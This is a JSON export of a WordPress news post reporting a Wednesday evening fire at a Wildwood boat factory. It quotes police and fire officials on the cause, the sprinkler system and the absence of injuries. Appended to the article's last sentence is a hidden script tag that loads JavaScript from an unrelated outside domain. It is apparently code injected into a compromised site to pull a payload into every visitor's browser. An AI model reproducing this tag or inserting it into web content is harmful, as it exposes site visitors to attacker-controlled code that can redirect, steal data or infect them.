{"id":210382,"date":"2016-10-20T20:48:05","date_gmt":"2016-10-21T00:48:05","guid":{"rendered":"https:\/\/wordpress-1.tempurl.host\/?p=210382"},"modified":"2017-11-04T15:11:37","modified_gmt":"2017-11-04T19:11:37","slug":"boat-factory-fire","status":"publish","type":"post","link":"https:\/\/thegraphicgeek.com\/demo-cflwire\/boat-factory-fire\/","title":{"rendered":"Fire Breaks Out at Local Boat Factory in Wildwood"},"content":{"rendered":"<p><strong>WILDWOOD &#8211;\u00a0<\/strong>A local boat factory caught fire Wednesday evening just before 7:00 pm in Wildwood.<\/p>\n<p>According to Wildwood Police Deputy Chief Valentino, emergency responders were dispatched to Crevalle Boats located at 1520 Industrial Drive in Wildwood behind Russell Stover Candies at 6:47 pm in response to a fire alarm.<\/p>\n<p>When officers arrived on the scene, the fire alarm was active and the officers observed black smoke coming from the roof of the building. Valentino stated that a preliminary search of the building revealed that no vehicles were present at the time and that all entrances to the building were locked and secured.<\/p>\n<p>Sumter County Fire Rescue arrived on the scene and was able to gain entry to the building by breaching one of the doors in order to extinguish the flames.<\/p>\n<p>Firefighters worked tirelessly to contain the blaze which was extinguished at approximately 8:13 pm.<\/p>\n<p>According to Valentino, the fire department&#8217;s command staff informed Wildwood Police that they believed the fire began on a shelf that contained various chemicals. The fire command staff also reported that the flames were mostly contained by the building&#8217;s fire sprinkler system and that there did not seem to be any suspicious activity that would have resulted in the fire.<\/p>\n<p>After the flames were extinguished, firefighters secured the building and ventilated the remaining smoke.<\/p>\n<p>A restoration company was scheduled to come and assess the damage caused by the blaze.<\/p>\n<p>No firefighters or civilians were injured during the incident.<script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>WILDWOOD &#8211;\u00a0A local boat factory caught fire Wednesday evening just before 7:00 pm in Wildwood.
